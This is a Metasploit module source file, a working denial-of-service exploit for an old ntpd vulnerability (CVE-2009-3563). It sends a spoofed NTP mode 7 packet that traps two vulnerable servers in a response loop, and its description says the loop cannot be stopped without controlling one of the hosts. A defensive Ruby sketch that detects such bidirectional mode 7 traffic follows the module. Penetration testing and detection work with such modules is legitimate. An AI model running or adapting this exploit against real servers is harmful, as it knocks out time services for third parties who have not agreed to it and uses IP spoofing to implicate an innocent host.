Path: blob/master/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NTP.org ntpd Reserved Mode Denial of Service',
      'Description'    => %q{
        This module exploits a denial of service vulnerability
        within the NTP (network time protocol) daemon. By sending
        a single packet to a vulnerable ntpd server (Victim A),
        spoofed from the IP address of another vulnerable ntpd server
        (Victim B), both victims will enter an infinite response loop.
        Note, unless you control the spoofed source host or the real
        remote host(s), you will not be able to halt the DoS condition
        once begun!
      },
      'Author'         => [ 'todb' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '37255' ],
          [ 'CVE', '2009-3563' ],
          [ 'OSVDB', '60847' ],
          [ 'URL', 'https://bugs.ntp.org/show_bug.cgi?id=1331' ]
        ],
      'DisclosureDate' => '2009-10-04'))

    register_options(
      [
        OptAddressLocal.new('LHOST', [true, "The spoofed address of a vulnerable ntpd server" ])
      ])
    deregister_options('FILTER','PCAPFILE')

  end

  def run_host(ip)
    open_pcap

    print_status("Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}")

    p = PacketFu::UDPPacket.new
    p.ip_saddr = datastore['LHOST']
    p.ip_daddr = ip
    p.ip_ttl = 255
    p.udp_src = 123
    p.udp_dst = 123
    # Both candidate payloads carry NTP mode 7 (low three bits of the first
    # byte); 0x97 additionally has the top (response) bit set.
    p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)]
    p.recalc
    capture_sendto(p,ip)

    close_pcap
  end
end
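A defender-side sketch, added here and not part of the Metasploit module: it flags the traffic pattern the description implies, NTP mode 7 packets exchanged in both directions between two hosts with both UDP ports set to 123. The record format, the `looping_pairs` helper, its threshold and the sample records are assumptions made for illustration.

```ruby
NTP_PORT = 123
MODE_PRIVATE = 7 # NTP mode 7: reserved/private, the mode named in the module above

# Decode the first byte of an NTP payload. In mode 7 the top bit is the response flag.
def ntp_first_byte(payload)
  return nil if payload.nil? || payload.empty?
  b = payload.getbyte(0)
  { mode: b & 0x07, version: (b >> 3) & 0x07, response: (b & 0x80) != 0 }
end

# Assumption: admin tools query mode 7 from an ephemeral source port, so mode 7
# with both ports equal to 123 is server-to-server traffic worth flagging.
def suspicious_mode7?(pkt)
  hdr = ntp_first_byte(pkt[:payload])
  return false unless hdr && hdr[:mode] == MODE_PRIVATE
  pkt[:sport] == NTP_PORT && pkt[:dport] == NTP_PORT
end

# Report host pairs exchanging flagged packets in both directions.
# threshold is an illustrative value, not taken from the page.
def looping_pairs(packets, threshold: 4)
  stats = Hash.new { |h, k| h[k] = { count: 0, senders: {} } }
  packets.each do |pkt|
    next unless suspicious_mode7?(pkt)
    pair = stats[[pkt[:src], pkt[:dst]].sort]
    pair[:count] += 1
    pair[:senders][pkt[:src]] = true
  end
  stats.select { |_, s| s[:count] >= threshold && s[:senders].size == 2 }.keys
end

# Constructed sample records (documentation addresses), not captured traffic.
HOST_A = '192.0.2.10'
HOST_B = '192.0.2.20'
MODE7_REPLY = "\x97\x00\x00\x00".b
SAMPLE = (
  Array.new(3) { { src: HOST_A, sport: 123, dst: HOST_B, dport: 123, payload: MODE7_REPLY } } +
  Array.new(3) { { src: HOST_B, sport: 123, dst: HOST_A, dport: 123, payload: MODE7_REPLY } } +
  [
    { src: '198.51.100.5', sport: 51_234, dst: HOST_A, dport: 123, payload: ("\x17" + "\x00" * 7).b },
    { src: '198.51.100.7', sport: 123, dst: HOST_A, dport: 123, payload: ("\x23" + "\x00" * 47).b },
    { src: '198.51.100.9', sport: 123, dst: HOST_B, dport: 123, payload: "\x17".b }
  ]
)

looping_pairs(SAMPLE).each { |a, b| puts "possible mode 7 loop: #{a} <-> #{b}" }
```

The mode 7 query from an ephemeral port and the mode 3 packet in the sample are deliberately left unflagged; only the bidirectional 123-to-123 pair is reported.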